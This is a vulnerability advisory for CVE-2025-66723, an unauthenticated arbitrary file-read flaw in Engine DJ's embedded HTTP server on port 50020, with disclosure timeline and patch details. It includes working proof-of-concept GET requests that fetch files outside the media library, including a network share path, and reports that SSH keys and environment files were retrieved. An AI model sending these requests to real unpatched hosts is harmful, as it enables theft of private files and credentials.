CVE-2025-66723: inMusic Brands Engine DJ >=3.0.0 through <4.3.4 exposes local and network files to external parties
inMusic Brands software Engine DJ contains an embedded HTTP server for transmitting media library files to connected clients on the network. The media files are referenced by filesystem path. Engine DJ does not authenticate clients or restrict requested filesystem paths. This allows an attacker to exfiltrate sensitive local or network-accessible files from affected systems.
An attacker requires only network access to the affected host; no authentication or prior interaction is required.
Engine DJ v4.3.4, released November 17, 2025, includes a mitigation. Users are encouraged to upgrade as soon as possible.
CVSS v3.1 Base Score: 7.5 (High)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Engine DJ >=3.0.0, <4.3.4, on all platforms (macOS, Windows).
Specifically tested versions found affected/vulnerable, macOS and Windows:
3.0.0, 3.0.1, 3.1.0, 3.1.1, 3.2.0, 3.3.0, 3.4.0,
4.0.0, 4.0.1, 4.1.0, 4.2.0, 4.2.1, 4.3.0
Specifically tested versions found unaffected, macOS and Windows:
2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.2.0, 2.2.1, 2.2.2, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
4.3.4
When started, Engine DJ binds to port :50020 on every IPv4 network interface
except for localhost.
Clients are intended to use a separate gRPC service on port :50010 to request
access and search for media files. Once the desired media file path is found,
the client will then make an HTTP request back on port :50020:
GET /download/%3CC%3A%2FMusic%2Ftest.flac%3E HTTP/1.1
Host: 192.0.2.1:50020
User-Agent: EngineOS/1.0 DenonDJ
Accept: */*
HTTP/1.1 200 OK
Content-Length: 37517194
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=5
…
Note: When decoded, the GET path above is simply:
/download/<C:/Music/test.flac>
It is not necessary to percent-encode to these characters when making requests.
An attacker can request anything accessible to the user of which the Engine DJ software is running as, as long as the path is known to the attacker. In this example, a text file is used for testing:
GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1
Host: 192.0.2.1:50020
HTTP/1.1 200 OK
Content-Length: 40
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=5
INSECURE...
From text file test.txt
Files accessed during proof-of-concept lab testing included private SSH keys and environment files.
Requested paths are not limited to local files. Network paths were also found to be accessible, subject to the permissions of the host:
/download/<//EXAMPLE-SERVER/C$/secret.txt>
Fortunately, there is no Access-Control-Allow-Origin header or related headers
in the response from the server. Therefore, files are not accessible from
normal web-based clients. Certain browser extensions or flags can be used to
loosen cross-origin request restrictions, but are uncommon.
IPv4 network traffic on port :50020 can be used to guess that
Engine DJ is in-use, but it does not indicate whether a host is vulnerable.
The embedded server does not identify itself in its responses, and there appears
to be no measurable difference between vulnerable and invulnerable versions of
Engine DJ. Therefore, it does not appear to be externally possible to determine
whether a host is vulnerable, short of attempting to request a file known to
exist.
Immediately after discovery, inMusic Brands was notified of the vulnerability through their technical support channels. Response was professional and swift, and a mitigation for the issue was released as part of v4.3.4 on November 17, 2025 for both macOS and Windows.
While media files can still be downloaded without authentication/authorization,
the requestable paths are now whitelisted so that attempting to access a file
outside of the media library is not possible. Users will receive a 403
response for anything not on the whitelist, even if it does not exist.
GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1
Host: 192.0.2.1:50020
HTTP/1.1 403 Forbidden
Content-Length: 17
Content-Type: text/html
Keep-Alive: timeout=5, max=5
…
Official downloads of the latest Engine DJ releases can be found on the official Engine DJ website:
https://enginedj.com/downloads
For questions about this report, please contact the author:
Brad Isbell, AudioPump, Inc. brad@audiopump.co